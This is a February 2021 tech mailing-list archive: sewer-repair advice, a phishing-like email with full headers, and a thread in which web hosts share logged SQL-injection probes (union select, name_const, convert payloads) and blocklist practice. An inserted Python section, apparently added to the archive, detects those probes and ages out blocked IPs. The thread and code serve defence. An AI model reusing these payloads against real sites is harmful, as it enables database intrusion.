Maybe you need a replacement. Anyone you contact, ask if they will clean the line and send a camera on a flexible line. We had one company clear the sewer line because it really needed it. Several years later, we contracted with a different company, and they cleared the line, which really needed it again, and they said the existing line was not fractured, it simply had roots intruding through the (normal for a 50 yo line) joints and we should contact them again in 3 or 4 years.

Point is, ask whatever company to clear the sewer line and ask them to give their best evaluation of the line.

Much experience, with houses and mobile homes.

- Doug

On Sun, Feb 14, 2021 at 6:19 PM Donald M Stevens via Hidden-discuss wrote:

Happy Valentine's Day all!

I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow.
I need a replacement of pipe and clean-out added.

Thanks!

Don

From andrew at stakeholderscapital.com Mon Feb 15 15:05:08 2021
From: andrew at stakeholderscapital.com (Andrew Bellak)
Date: Mon, 15 Feb 2021 10:05:08 -0500
Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair
In-Reply-To: 
References: 
Message-ID: <3c82feff-f397-32a6-95fd-b9fc0cdbc5af@stakeholderscapital.com>

Hey Don,

Mark of W. MA Rooter has been in the business for like 30+ years. I'm sure he could refer you to a vendor if he doesn't do all the work. When I talked to Mark just recently for a job at my house, he described the water jet tech and pros and cons.

Good luck.

-ab

On 2/15/2021 9:13 AM, Donald M Stevens wrote:
>
> Thanks for getting back to me Doug and Andrew,
>
> Here is a little more information,
>
> I have had the "water jet" snake and camera process already done,
> "water jet" snake cleared it up last year temporarily,
> Camera showed roots in the line at 170',
> The auger / drill type snake that can cut through roots only goes 150',
> My sewer line is over 200'
> long, with no clean-out in between my house and the road,
>
> So what I am looking for is someone to dig up,
> replace the pipe that is infiltrated by tree roots,
> then put in a clean out so that in the future someone could snake up the line or down the line to clear any future clogs.
>
> I have been calling contractors, but can't get a call back, or the 2-3 people that did call back, don't come out.
> Maybe it's a small job, or I think because of all the snow storms, many of these contractors are out plowing, and that has been keeping them busy.
>
> Thanks!
>
> Don
>
> *From:* Doug Lowing
> *Sent:* Sunday, February 14, 2021 10:26 PM
> *To:* Donald M Stevens
> *Subject:* Re: [Hidden-tech] looking for someone that does sewer line / pipe repair
>
> Hidden tech we may be, but when it gets down to it, we all realize the most important part of modern technology - a toilet that flushes successfully
>
> Maybe you need a replacement. Anyone you contact, ask if they will clean the line and send a camera on a flexible line. We had one company clear the sewer line because it really needed it. Several years later, we contracted with a different company, and they cleared the line, which really needed it again, and they said the existing line was not fractured, it simply had roots intruding through the (normal for a 50 yo line) joints and we should contact them again in 3 or 4 years.
>
> Point is, ask whatever company to clear the sewer line and ask them to give their best evaluation of the line.
>
> Much experience, with houses and mobile homes.
>
> - Doug
>
> On Sun, Feb 14, 2021 at 6:19 PM Donald M Stevens via Hidden-discuss wrote:
>
> Happy Valentine's Day all!
>
> I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow.
>
> I need a replacement of pipe and clean-out added.
>
> Thanks!
>
> Don

-- 
Andrew Bellak
CEO
Registered Investment Advisor
Andrew at StakeholdersCapital.com
(o) 888-STK-HLDR (785-4537) x.2
(f) 888-735-HLDR (4537)
he/him
skype = andrewbellak
twitter = @andrewbellak, @stakeholderscap

From wennemyr.magnus at gmail.com Mon Feb 15 18:24:42 2021
From: wennemyr.magnus at gmail.com (Magnus Wennemyr)
Date: Mon, 15 Feb 2021 13:24:42 -0500
Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair
In-Reply-To: 
References: 
Message-ID: 

I had a good experience just last month with Always Reliable out of Hadley, (413) 250-7981, with the same problem, tree roots in my service line. They got back with me very quickly and were responsive throughout.

magnus

On Mon, Feb 15, 2021 at 9:20 AM Donald M Stevens via Hidden-discuss <hidden-discuss at lists.hidden-tech.net> wrote:

> Thanks for getting back to me Doug and Andrew,
>
> Here is a little more information,
>
> I have had the "water jet" snake and camera process already done,
> "water jet" snake cleared it up last year temporarily,
> Camera showed roots in the line at 170',
> The auger / drill type snake that can cut through roots only goes 150',
> My sewer line is over 200' long, with no clean-out in between my house and the road,
>
> So what I am looking for is someone to dig up,
> replace the pipe that is infiltrated by tree roots,
> then put in a clean out so that in the future someone could snake up the line or down the line to clear any future clogs.
>
> I have been calling contractors, but can't get a call back, or the 2-3 people that did call back, don't come out.
> Maybe it's a small job, or I think because of all the snow storms, many of these contractors are out plowing, and that has been keeping them busy.
>
> Thanks!
>
> Don
>
> *From:* Doug Lowing
> *Sent:* Sunday, February 14, 2021 10:26 PM
> *To:* Donald M Stevens
> *Subject:* Re: [Hidden-tech] looking for someone that does sewer line / pipe repair
>
> Hidden tech we may be, but when it gets down to it, we all realize the most important part of modern technology - a toilet that flushes successfully
>
> Maybe you need a replacement. Anyone you contact, ask if they will clean the line and send a camera on a flexible line. We had one company clear the sewer line because it really needed it. Several years later, we contracted with a different company, and they cleared the line, which really needed it again, and they said the existing line was not fractured, it simply had roots intruding through the (normal for a 50 yo line) joints and we should contact them again in 3 or 4 years.
>
> Point is, ask whatever company to clear the sewer line and ask them to give their best evaluation of the line.
>
> Much experience, with houses and mobile homes.
>
> - Doug
>
> On Sun, Feb 14, 2021 at 6:19 PM Donald M Stevens via Hidden-discuss <hidden-discuss at lists.hidden-tech.net> wrote:
>
> Happy Valentine's Day all!
>
> I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow.
>
> I need a replacement of pipe and clean-out added.
>
> Thanks!
> Don
>
> TFI Technologies
> "we are here to help you..."
> 329 Pease Road
> East Longmeadow, MA 01028
> Office: 413.308.4511
> Cell / Text: 860.614.4153
> Email: dstevens at tryandfindit.com
> LinkedIn: linkedin.com/in/don-stevens-504aa6b
> Skype: tryandfindit
>
> _______________________________________________
> Hidden-discuss mailing list - home page: http://www.hidden-tech.net
> Hidden-discuss at lists.hidden-tech.net
>
> You are receiving this because you are on the Hidden-Tech Discussion list.
> If you would like to change your list preferences, Go to the Members
> page on the Hidden Tech Web site.
> http://www.hidden-tech.net/members

From tech at montaguewebworks.com Mon Feb 15 19:53:39 2021
From: tech at montaguewebworks.com (Michael Muller)
Date: Mon, 15 Feb 2021 14:53:39 -0500
Subject: [Hidden-tech] Growing Botnet?
Message-ID: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com>

Hey HT web hosts out there,

Due to recent hacking attempts against our servers, I have installed an IP Tracker that tracks and blocks any aggressive activity.

Starting late last week we've found a growing number of IP numbers that appear to be attempting SQL Injection attacks. I've pasted a few snippets from our logs, below.

Anyone else seeing this kind of activity on their servers? Every time I block an IP number they move to another IP number. The list of IPs hitting us is growing, and moving across multiple hosts.
So far, I've contacted four different server hosts about the traffic coming from their servers. By far the most "infected" appears to be the Unified Layer family of hosting companies, which includes HostGator Mexico, webhostbox Bigrock India, and a number of others. Additional sources of the attacks are Hetzner.com from Germany; Ozkula from Turkey; and ColoCrossing from Buffalo NY. I'm sure more will be added as the days go on.

Stay safe.

Mik

94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x

37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x

192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x

--
---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
http://MontagueWebWorks.com
Powered by ROCKETFUSION

From paul at bissex.net Mon Feb 15 21:25:10 2021
From: paul at bissex.net (Paul Bissex)
Date: Mon, 15 Feb 2021 16:25:10 -0500
Subject: [Hidden-tech] Growing Botnet?
In-Reply-To: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com>
References: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com>
Message-ID: <05b9d47c-f3bd-ef34-d8ea-455281f607a3@gmail.com>

Hi Mik,

I don't host others' sites these days but I do keep a close eye on suspicious requests to my pastebin site (dpaste.com) and maintain a blocklist. Out of curiosity I looked for the IPs you shared; none of them are currently on my list. No SQL injection attempts either (though lots of 404s looking for wp-login.php).

Because of the whack-a-mole syndrome you identify, last year I moved to a dynamic blocking setup. I have automation to detect and block bad-behaving IPs; then I age them out if they go three days without reoffending. The list is typically 1000 to 2000 IPs long. I've had good results from this, and zero complaints from users whose IP happened to have been previously used by a botnet/spammer.

Good luck!

P

--
Paul Bissex, software engineer
http://paulbissex.com/
Greenfield MA 01301 USA
413-230-9451

From jm-hiddentech at vj8.net Tue Feb 16 00:34:26 2021
From: jm-hiddentech at vj8.net (James Triplett)
Date: Mon, 15 Feb 2021 19:34:26 -0500
Subject: [Hidden-tech] Fiber Internet in Greenfield?
In-Reply-To: <010001778daf3a26-b30265d1-542d-4aa2-a707-fdcc4cea9962-000000@email.amazonses.com>
References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> <010001778daf3a26-b30265d1-542d-4aa2-a707-fdcc4cea9962-000000@email.amazonses.com>
Message-ID: <20210216003426.tuuivlehmasqi5f4@bermuda.datamat.net>

On (10/02/21 20:43), Matthew Crocker wrote:
> Date: Wed, 10 Feb 2021 20:43:27 +0000
> From: Matthew Crocker
> To: James Triplett, hidden-discuss at lists.hidden-tech.net
> Subject: Re: [Hidden-tech] Fiber Internet in Greenfield?
>
> James,
>
> What is the address you are looking for? MBI can do lateral builds, not sure if 20-30 mbps is big enough to justify the cost though. Have you looked at GCET?

Thanks, people, GCET looks like the place to look; they seem to have lots of bandwidth ;-)

james

From sam at itabix.com Tue Feb 16 16:59:32 2021
From: sam at itabix.com (Sam McClellan)
Date: Tue, 16 Feb 2021 11:59:32 -0500
Subject: [Hidden-tech] Growing Botnet?
In-Reply-To: <05b9d47c-f3bd-ef34-d8ea-455281f607a3@gmail.com>
References: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com> <05b9d47c-f3bd-ef34-d8ea-455281f607a3@gmail.com>

Hi Mik,

Thanks for the heads up. We haven't seen any increase in IP based attacks lately, last time we saw an increase was about four months ago. So maybe you're just the lucky winner this time.

Best,
Sam

Sam McClellan
Itabix, Inc
one place for all things web
sam at itabix.com
https://itabix.com
Main - 413.587.4600
Toll-free - 877-7ITABIX (877.748.2249)
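Mik's log excerpts and Paul's age-out blocklist, worked through as an added example (my code, not anything posted in this thread): it parses lines in the shape of Mik's excerpts, flags the injection signatures those probes carry once the query is URL-decoded, and keeps a blocklist that releases an address after three days without a repeat offence. The sample lines, the `example.test` host and the documentation-range IPs are constructed for the example, not taken from anyone's logs.

```python
"""Detection for the SQL-injection probes in Mik's log excerpts, plus an
age-out blocklist of the kind Paul describes (three days without reoffending).
Added example; the sample lines are constructed in the shape of the excerpts
with RFC 5737 documentation addresses and a placeholder host, not real traffic."""
import re
from datetime import date, datetime, timedelta
from urllib.parse import unquote_plus

# Excerpt shape: "<ip> <HH:MM:SS> <host> <path> <query>"; the first excerpt has
# "<query> <path>" instead, so everything after the host is taken as one field.
LOG_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\d\d:\d\d:\d\d)\s+(\S+)\s+(.+)$")

# Signatures lifted from the decoded probes in the thread, checked in order.
SIGNATURES = (
    ("tautology",        re.compile(r"\b(?:and|or)\s+1\s*=\s*1\b", re.I)),
    ("union-select",     re.compile(r"\bunion\s+select\b", re.I)),
    ("convert-int",      re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("name_const",       re.compile(r"\bname_const\s*\(", re.I)),
    ("quoted-tautology", re.compile(r"""(['"])x\1\s*=\s*\1x""", re.I)),
)

def parse_line(line):
    """(ip, hh:mm:ss, host, decoded request), or None if the line does not fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ip, hhmmss, host, request = m.groups()
    # One round of URL decoding exposes the spaces, quotes and commas the
    # probes carry as %20, %27, %22 and %2c.
    return ip, hhmmss, host, unquote_plus(request)

def classify(decoded_request):
    """Labels of every signature that fires; a probe combining tricks gets all."""
    return [label for label, rx in SIGNATURES if rx.search(decoded_request)]

class AgingBlocklist:
    """Block on first offence, release after `ttl` without a repeat."""
    def __init__(self, ttl=timedelta(days=3)):
        self.ttl = ttl
        self._last_seen = {}  # ip -> datetime of most recent offence

    def offend(self, ip, when):
        self._last_seen[ip] = when  # a repeat offence restarts the clock

    def is_blocked(self, ip, now):
        seen = self._last_seen.get(ip)
        return seen is not None and now - seen <= self.ttl

    def expire(self, now):
        """Drop every entry idle longer than ttl; returns the released IPs."""
        stale = sorted(ip for ip, seen in self._last_seen.items() if now - seen > self.ttl)
        for ip in stale:
            del self._last_seen[ip]
        return stale

    def blocked(self):
        return sorted(self._last_seen)

def scan(lines, day, blocklist):
    """Run the signatures over excerpt-format lines logged on `day` (the excerpts
    carry only a time of day); returns (ip, host, labels) for each hit and
    records every offending IP in the blocklist."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # not an excerpt-format line
        ip, hhmmss, host, decoded = parsed
        labels = classify(decoded)
        if labels:
            when = datetime.combine(day, datetime.strptime(hhmmss, "%H:%M:%S").time())
            blocklist.offend(ip, when)
            hits.append((ip, host, labels))
    return hits

# Constructed sample traffic (placeholder IPs and host) in the excerpt shape.
SAMPLE_LOG = [
    "203.0.113.7 13:38:59 example.test /z term=0%20AND%201=1",
    "203.0.113.7 13:39:01 example.test /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1",
    "203.0.113.7 13:39:03 example.test /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x",
    "203.0.113.7 13:39:06 example.test /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108),1),name_const(CHAR(111,108),1))a)%20--%20and%201%3D1",
    "203.0.113.9 14:58:55 example.test /z term=Licensing",
    "203.0.113.9 14:58:57 example.test /z term=Licensing%20AND%201=1",
    "198.51.100.4 09:00:00 example.test term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)))",
    "not a log line",
]

def demo():
    """Scan the sample as 2021-02-15 traffic, age the list out at noon on
    2021-02-18, then let one released IP reoffend; returns a summary dict."""
    bl = AgingBlocklist()
    hits = scan(SAMPLE_LOG, date(2021, 2, 15), bl)
    before = bl.blocked()
    released = bl.expire(datetime(2021, 2, 18, 12, 0, 0))
    after = bl.blocked()
    scan(["198.51.100.4 12:30:00 example.test /z term=x%20AND%201=1"], date(2021, 2, 18), bl)
    return {"hits": hits, "blocked_after_scan": before, "released": released,
            "blocked_after_expiry": after, "blocked_after_reoffence": bl.blocked()}
```

The plain `term=Licensing` search produces no labels and is never blocked, which is the property Paul relies on to avoid complaints from users who later inherit a botnet's address.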
From lkuttner at nesea.org Wed Feb 17 15:23:46 2021
From: lkuttner at nesea.org (Larry Kuttner)
Date: Wed, 17 Feb 2021 10:23:46 -0500
Subject: [Hidden-tech] Growing Botnet?

Mik-- We have been seeing some of those for a while. I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their customer, which seems ridiculous.

Their response was:

Thank you for your abuse report. We can only process your report by first forwarding them to our customer. We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer.

--
Larry Kuttner
Information Technology Manager
Northeast Sustainable Energy Association (NESEA)
20 Federal Street, Greenfield, MA 01301
413.774.6051 ext. 12
lkuttner at nesea.org

From jackjrabbit at gmail.com Wed Feb 17 17:07:08 2021
From: jackjrabbit at gmail.com (Jack L.)
Date: Wed, 17 Feb 2021 12:07:08 -0500
Subject: [Hidden-tech] Fwd: Growing Botnet?

---------- Forwarded message ---------
From: Jack L.
Date: Wed, Feb 17, 2021, 12:06
Subject: Re: [Hidden-tech] Growing Botnet?
To: Larry Kuttner

That sounds extremely unstandard. Spoke to a friend; they questioned if that's in line with RIPE policy as an IP space owner. I'd escalate if you actually want a response.

On Wed, Feb 17, 2021, 10:55 Larry Kuttner via Hidden-discuss <hidden-discuss at lists.hidden-tech.net> wrote:
> Mik-- We have been seeing some of those for a while. I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their customer, which seems ridiculous.
> Their response was:
>
> Thank you for your abuse report. We can only process your report by first forwarding them to our customer. We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer.
>
> --
> Larry Kuttner
> Information Technology Manager
> Northeast Sustainable Energy Association (NESEA)
> 20 Federal Street, Greenfield, MA 01301
> 413.774.6051 ext. 12
> lkuttner at nesea.org

From tech at montaguewebworks.com Thu Feb 18 20:50:09 2021
From: tech at montaguewebworks.com (Michael Muller)
Date: Thu, 18 Feb 2021 15:50:09 -0500
Subject: [Hidden-tech] [Michael Muller] Re: Building a Gaming computer
Message-ID: <0d5520c4-a688-2fa9-646b-b5c78e1e6655@montaguewebworks.com>

Did everyone get this email back on Feb 5 from "Stephen "

It had an XLS file attached and the emailer asked me to sign it and email it back. Yeah, right.. Looks like someone's account has been hacked.

Full headers, below. Original email below that.
Mik

Return-Path:
Received: from bulk.webworksserver.com (ns2.webworksserver.com [216.144.202.140]) by mail.montaguewebworks.com with SMTP; Fri, 5 Feb 2021 12:21:40 -0500
Received: from eastern.birch.relay.mailchannels.net (eastern.birch.relay.mailchannels.net [23.83.209.55]) by bulk.webworksserver.com with SMTP; Fri, 5 Feb 2021 12:21:11 -0500
X-Sender-Id: spamcontrol26|x-authuser|antwon.bechtelar at imperfecciones.inatural24.com
Received: from relay.mailchannels.net (localhost [127.0.0.1]) by relay.mailchannels.net (Postfix) with ESMTP id 37E6E3626DE for ; Fri, 5 Feb 2021 17:21:10 +0000 (UTC)
Received: from single-4760.banahosting.com (100-96-17-21.trex.outbound.svc.cluster.local [100.96.17.21]) (Authenticated sender: spamcontrol26) by relay.mailchannels.net (Postfix) with ESMTPA id CBF54361B28 for ; Fri, 5 Feb 2021 17:21:08 +0000 (UTC)
X-Sender-Id: spamcontrol26|x-authuser|antwon.bechtelar at imperfecciones.inatural24.com
Received: from single-4760.banahosting.com (single-4760.banahosting.com [216.246.112.130]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384) by 100.96.17.21 (trex/6.0.2); Fri, 05 Feb 2021 17:21:10 +0000
X-MC-Relay: Neutral
X-MailChannels-SenderId: spamcontrol26|x-authuser|antwon.bechtelar at imperfecciones.inatural24.com
X-MailChannels-Auth-Id: spamcontrol26
X-Broad-Glossy: 558c9eac2a044873_1612545670028_996257083
X-MC-Loop-Signature: 1612545670028:2745538572
X-MC-Ingress-Time: 1612545670028
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=imperfecciones.inatural24.com; s=default; h=To:From:sender:Content-Type:list-subscribe:list-help:list-post:list-archive:list-unsubscribe:list-id:Subject:Message-ID:Date:In-Reply-To:References:MIME-Version:Reply-To:Cc:Content-Transfer-Encoding:Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:List-Owner; bh=8QbOk5X/DJC/JrDLwywE3Z5EcCTx9NewgTRN4ZM2KPc=;
Received: from [103.142.121.6] (port=58726 helo=imperfecciones.inatural24.com) by single-4760.banahosting.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (Exim 4.93) (envelope-from ) id 1l84mw-0001Aa-7P for tech at montaguewebworks.com; Fri, 05 Feb 2021 12:21:03 -0500
delivered-to: rroth at tnrglobal.com
delivered-to: rzroth at gmail.com
arc-seal: i=1; a=rsa-sha256; t=1611268628; cv=none; d=google.com; s=arc-20160816;
arc-message-signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=sender:errors-to:cc:reply-to:from:list-subscribe:list-help:list-post:list-archive:list-unsubscribe:list-id:precedence:subject:to:message-id:date:in-reply-to:references:mime-version:dkim-signature:delivered-to; bh=rwZDk7lq3lrkvu+1S7/aTNv2X7BaX5FbTLyVpYlhSgk=;
arc-authentication-results: i=1; mx.google.com; dkim=neutral (body hash did not verify) header.i=@justpeachy.io header.s=google header.b=VNjaU3CS; spf=pass (google.com: domain of hidden-discuss-bounces at lists.hidden-tech.net designates 3.17.96.37 as permitted sender) smtp.mailfrom=hidden-discuss-bounces at lists.hidden-tech.net; dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=hidden-tech.net
received-spf: pass (google.com: domain of hidden-discuss-bounces at lists.hidden-tech.net designates 3.17.96.37 as permitted sender) client-ip=3.17.96.37;
authentication-results: mx.google.com; dkim=neutral (body hash did not verify) header.i=@justpeachy.io header.s=google header.b=VNjaU3CS; spf=pass (google.com: domain of hidden-discuss-bounces at lists.hidden-tech.net designates 3.17.96.37 as permitted sender) smtp.mailfrom=hidden-discuss-bounces at lists.hidden-tech.net; dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=hidden-tech.net
authentication-results: dmoz.awboc.com; dkim=fail (verification failed) header.i=@justpeachy.io; x-dkim-adsp=none
delivered-to: hidden-discuss at dmoz.awboc.com
MIME-Version: 1.0
References:
In-Reply-To:
Date: Fri, 05 Feb 2021 17:20:59 -0600
Message-ID:
Subject: [Michael Muller] Re: [Hidden-tech] Building a Gaming computer
precedence: list
list-id:
list-unsubscribe: ,
list-archive:
list-post:
list-help:
list-subscribe: ,
Content-Type: multipart/mixed; boundary="===============4690247477778557202=="
sender: Hidden-discuss
X-Priority: 3 (Normal)
From: Stephen
To: "Michael Muller"
X-YourOrg-MailScanner-Information: Please contact the ISP for more information
X-YourOrg-MailScanner-ID: 1l84mw-0001Aa-7P
X-YourOrg-MailScanner: Found to be clean
X-YourOrg-MailScanner-SpamCheck:
X-YourOrg-MailScanner-From: antwon.bechtelar at imperfecciones.inatural24.com
X-Spam-Status: No
X-AuthUser: antwon.bechtelar at imperfecciones.inatural24.com
X-Exim-Id: D74A3708C7EA2C3662E6C0CBD46EC1AA17A63A8F
X-Declude-Sender: antwon.bechtelar at imperfecciones.inatural24.com [216.144.202.140]
X-Declude-Spoolname: 93590942.eml
X-Declude-RefID:
X-Declude-Note: Scanned by Declude 4.12.11
X-Declude-Scan: Incoming Score [0] at 12:21:50 on 05 Feb 2021
X-Declude-Tests: Whitelisted
X-Country-Chain: UNITED STATES->destination
X-Declude-Code: 2000010f
X-HELO: bulk.webworksserver.com
X-Identity: 216.144.202.140 | ns2.webworksserver.com | imperfecciones.inatural24.com
X-SmarterMail-Spam: Declude: 0
X-SmarterMail-TotalSpamWeight: 0 (Authenticated)

---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
http://MontagueWebWorks.com
Powered by ROCKETFUSION

On 2/5/2021 6:20 PM, Stephen wrote:
>
> Good afternoon,
> Please examine and sign the attached documentation.
>
>
>> Seconding Mik's recommendation! About Face is great.
>>
>> On Thu, Jan 21, 2021 at 2:03 PM Michael Muller via Hidden-discuss wrote:
>>
>> I always like working with About Face Computers in Turners.
>>
>> * https://about-facecomputers.com
>>
>> Mik
>>
>> ---
>> Mik Muller, president
>> Montague WebWorks
>> 239-R Main Street, Greenfield, MA
>> 413-320-5336
>> http://MontagueWebWorks.com
>> Powered by ROCKETFUSION
>>
>> On 1/19/2021 9:54 PM, David Ruderman via Hidden-discuss wrote:
>>> Hey friends,
>>>
>>> Do any of you have a recommendation for someone or a local business who can help my 19 year old stepson finish building his high end gaming computer? He bought what he says are all the components but he is stuck with nothing powering up. He realizes this wouldn't be free, of course.
>>>
>>> Thanks,
>>>
>>> -dave
From tech at montaguewebworks.com Thu Feb 18 20:58:25 2021
From: tech at montaguewebworks.com (Michael Muller)
Date: Thu, 18 Feb 2021 15:58:25 -0500
Subject: [Hidden-tech] Growing Botnet?
Message-ID: <205e1001-8f42-9cae-5691-ccb773348252@montaguewebworks.com>

What the? Bizarre.

I've been forwarding the list of attack page requests to the NOC for the IPs I've been finding. The list has been growing every day. And yes, Hetzner is in my list. This is what I got back from them, along with a ticket number:

Hi there

We received your email. Thanks for writing to us. You have probably realized by now that this is an automated message. We need some time to process each email that we receive, but we will write back to you personally as soon as we can.

Thank you for your understanding!

Kind regards
Your Hetzner Online Team

Hetzner Online GmbH
Industriestr. 25
91710 Gunzenhausen / Germany
Tel.: +49 9831 505-0
Fax: +49 9831 505-3
www.hetzner.com

I also sent an abuse email to another host and got this back!

---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
http://MontagueWebWorks.com
Powered by ROCKETFUSION

On 2/17/2021 10:23 AM, Larry Kuttner via Hidden-discuss wrote:
> Mik-- We have been seeing some of those for a while. I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their customer, which seems ridiculous.
> Their response was:
> Thank you for your abuse report.
> We can only process your report by first forwarding them to our customer.
> We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer.
>
> --
> Larry Kuttner
> Information Technology Manager
> Northeast Sustainable Energy Association (NESEA)
> 20 Federal Street, Greenfield, MA 01301
> 413.774.6051 ext. 12
> lkuttner at nesea.org

-------------- next part --------------
A non-text attachment was scrubbed...
Name: bgpmecaihgfdgmik.png
Type: image/png
Size: 33992 bytes
Desc: not available

From eddygold at aol.com Fri Feb 19 14:07:11 2021
From: eddygold at aol.com (eddygold at aol.com)
Date: Fri, 19 Feb 2021 14:07:11 +0000 (UTC)
Subject: [Hidden-tech] Book recommendation
References: <1328862444.202743.1613743631915.ref@mail.yahoo.com>
Message-ID: <1328862444.202743.1613743631915@mail.yahoo.com>

The Age of Surveillance Capitalism, Shoshana Zuboff.

Eddy in Amherst
URL: From rich at tnrglobal.com Fri Feb 19 15:11:54 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Fri, 19 Feb 2021 10:11:54 -0500 Subject: [Hidden-tech] [Michael Muller] Re: Building a Gaming computer In-Reply-To: <0d5520c4-a688-2fa9-646b-b5c78e1e6655@montaguewebworks.com> References: <0d5520c4-a688-2fa9-646b-b5c78e1e6655@montaguewebworks.com> Message-ID: Anyone who got that message please reply to me directly - I would sure like to get to the source of this. It's identified by the From and XML contents - not by the subject. The only reference back to me is in the headers and yet I never saw the message with XML attachments. I keep folders of bogus messages and all messages in an archive or (that recent) junk or spam folders. AND if you goggle that email antwon.bechtelar -- it shows up in a PHP git class that generates fake names for testing. I removed the headers Mik posted - you can see the full email down the list. Lets keep more this off the list and I'll report how many saw it and if anything comes up. As for now, Mik and Stephen Michel saw it - with different bodies. This leads me to believe someone has just taken and hand hacked some of the HT archive -- date 2/5 on both. And thanks Mik for the full headers - that is what is needed to make any sense of this. Stay well - Rich On 2/18/2021 3:50 PM, Michael Muller via Hidden-discuss wrote: > > Did everyone get this email back on Feb 5 from "Stephen > " > > It had an XLS file attached and the emailer asked me to sign it and > email it back. Yeah, right.. Looks like someone's account has been hacked. > > Full headers, below. Original email below that. 
